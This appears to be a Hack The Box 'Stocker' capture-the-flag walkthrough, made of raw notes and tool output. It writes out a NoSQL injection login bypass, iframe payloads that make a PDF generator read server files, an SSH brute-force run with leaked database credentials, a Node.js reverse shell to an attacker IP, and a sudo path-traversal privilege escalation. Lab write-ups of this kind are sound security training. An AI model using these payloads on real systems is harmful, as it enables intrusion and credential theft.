https://app.hackthebox.com/machines/Stocker
exec: nmap -A 10.10.11.196 -e tun0
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 10:27 HKT
Nmap scan report for 10.10.11.196
Host is up (1.0s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.82 seconds
edit the host and ip
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kwkl.kwkl kwkl
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.196 stocker.htb
browser the site!
nginx/1.18.0 (Ubuntu)
Please sign in
Username
Password
POST /login HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 23
Origin: http://dev.stocker.htb
Connection: close
Referer: http://dev.stocker.htb/login
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
Upgrade-Insecure-Requests: 1
{"username": {"$ne": null}, "password": {"$ne": null} }
this api is genrate a pdf file:
turn it to the repeater
edit the title
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 317
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"Grayhat","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
┌──(kwkl㉿kwkl)-[~/HODL/htb/stocker]
└─$ exiftool document.pdf
ExifTool Version Number : 12.56
File Name : document.pdf
Directory : .
File Size : 40 kB
File Modification Date/Time : 2023:02:27 21:50:31+08:00
File Access Date/Time : 2023:02:27 22:00:35+08:00
File Inode Change Date/Time : 2023:02:27 21:50:31+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Tagged PDF : Yes
Creator : Chromium
Producer : Skia/PDF m108
Create Date : 2023:02:27 13:46:38+00:00
Modify Date : 2023:02:27 13:46:38+00:00
┌──(kwkl㉿kwkl)-[~/HODL/htb/stocker]
└─$
search Skia/PDF m108 exploit!
https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file
use it
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 342
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:///etc/passwd> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
Key request:
1:
<iframe src=file:///etc/passwd height=1050px width=800px>
2:
<iframe src=file:etc/nginx/nginx.conf height=1050px width=800px>
3:
<iframe src=file:var/www/dev/index.js height=1050px width=800px>
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 368
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:///etc/passwd height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
PDF:
Item Price
(£) Quant
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 379
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:etc/nginx/nginx.conf height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
Item Price
(£) Quant
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
##
# Basic Settings
##
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;
# server_names_hash_bucket_size 64;
# server_name_in_redirect off;
include /etc/nginx/mime.types;
default_type application/octet-stream;
##
# SSL Settings
##
ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
##
# Gzip Settings
##
gzip on;
# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml
application/xml application/xml+rss text/javascript;
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
server {
listen 80;
root /var/www/dev;
index index.html index.htm index.nginx-debian.html;
POST /api/order HTTP/1.1
Host: dev.stocker.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://dev.stocker.htb/stock
Content-Type: application/json
Origin: http://dev.stocker.htb
Content-Length: 379
Connection: close
Cookie: connect.sid=s%3AxXnxKOOhFnu0wEsQssRsG8Au1_-zhbSN.pI1RRhNLMC%2F4b3PisY5yAqD5Ct8LlSLsByzql43fe9s
{"basket":[{"_id":"638f116eeb060210cbd83a8f","title":"<iframe src=file:var/www/dev/index.js height=1050px width=800px> ","description":"It's a rubbish bin.","image":"bin.jpg","price":76,"currentStock":15,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a8d","title":"Cup","description":"It's a red cup.","image":"red-cup.jpg","price":32,"currentStock":4,"__v":0,"amount":1}]}
Item Price
(£) Quant
const express = require("express");
const mongoose = require("mongoose");
const session = require("express-session");
const MongoStore = require("connect-mongo");
const path = require("path");
const fs = require("fs");
const { generatePDF, formatHTML } = require("./pdf.js");
const { randomBytes, createHash } = require("crypto");
const app = express();
const port = 3000;
// TODO: Configure loading from dotenv for production
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(
session({
secret: randomBytes(32).toString("hex"),
resave: false,
saveUninitialized: true,
store: MongoStore.create({
mongoUrl: dbURI,
}),
})
);
app.use("/static", express.static(__dirname + "/assets"));
app.get("/", (req, res) => {
return res.redirect("/login");
});
app.get("/api/products", async (req, res) => {
if (!req.session.user) return res.json([]);
const products = await mongoose.model("Product").find();
return res.json(products);
});
app.get("/login", (req, res) => {
if (req.session.user) return res.redirect("/stock");
return res.sendFile(__dirname + "/templates/login.html");
});
app.post("/login", async (req, res) => {
const { username, password } = req.body;
if (!username || !password) return res.redirect("/login?error=login-error");
// TODO: Implement hashing
const user = await mongoose.model("User").findOne({ username, password });
if (!user) return res.redirect("/login?error=login-error");
req.session.user = user.id;
console.log(req.session);
return res.redirect("/stock");
});
app.post("/api/order", async (req, res) => {
if (!req.session.user) return res.json({});
if (!req.body.basket) return res.json({ success: false });
keyword:
mongodb❌113:65534::/home/mongodb:/usr/sbin/nologin
angoose❌1001:1001:,:/home/angoose:/bin/bash
const dbURI = “mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1”;
┌──(kwkl㉿kwkl)-[~/HODL/htb/stocker]
└─$ hydra -L user.txt -P pass.txt ssh://10.10.11.196 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-27 22:31:53
[DATA] max 4 tasks per 1 server, overall 4 tasks, 12 login tries (l:3/p:4), ~3 tries per task
[DATA] attacking ssh://10.10.11.196:22/
[22][ssh] host: 10.10.11.196 login: angoose password: IHeardPassphrasesArePrettySecure
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-27 22:32:42
┌──(kwkl㉿kwkl)-[~]
└─$ ssh angoose@10.10.11.196 255 ⨯
angoose@10.10.11.196’s password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
angoose@stocker:~$
Try :https://www.revshells.com
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("sh", []);
var client = new net.Socket();
client.connect(9999, "10.10.10.140", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
Try twice:
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Sorry, try again.
[sudo] password for angoose:
Sorry, try again.
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
angoose@stocker:~$ pwd
/home/angoose
angoose@stocker:~$ vim what.js
angoose@stocker:~$ /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js
node:events:491
throw er; // Unhandled 'error' event
^
Error: connect EHOSTUNREACH 10.10.10.140:9999
at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1300:16)
Emitted 'error' event on Socket instance at:
at emitErrorNT (node:internal/streams/destroy:151:8)
at emitErrorCloseNT (node:internal/streams/destroy:116:3)
at process.processTicksAndRejections (node:internal/process/task_queues:82:21) {
errno: -113,
code: 'EHOSTUNREACH',
syscall: 'connect',
address: '10.10.10.140',
port: 9999
}
Node.js v18.12.1
angoose@stocker:~$ vim what.js
angoose@stocker:~$ /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js
^C
angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/what.js
^C
angoose@stocker:~$ cat what.js
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("sh", []);
var client = new net.Socket();
client.connect(9999, "10.10.16.13", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
angoose@stocker:~$
──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 9999
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.196.
Ncat: Connection from 10.10.11.196:52840.
ls
user.txt
what.js
pwd
/home/angoose
cat user.txt
281c83eaba088b98d6df59be80493c85
cd /root
sh: 4: cd: can't cd to /root
id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvnp 9999
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.196.
Ncat: Connection from 10.10.11.196:39426.
ls
flag.js
user.txt
what.js
cat user.txt
281c83eaba088b98d6df59be80493c85
cat flag.js
const fs = require(‘fs’);
fs.readFile(‘/root/root.txt’, ‘utf8’, (err, data) => {
if (err) throw err;
console.log(data);
});
cat /root/root.txt
ae1c1b43a9d4c11496940f0b908d4bea
id
uid=0(root) gid=0(root) groups=0(root)
Ref:;https://app.hackthebox.com
https://blog.csdn.net/qq_45894840/article/details/128765294
Think:
Many new tech! I feel wonderful!
扫一扫
8193
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
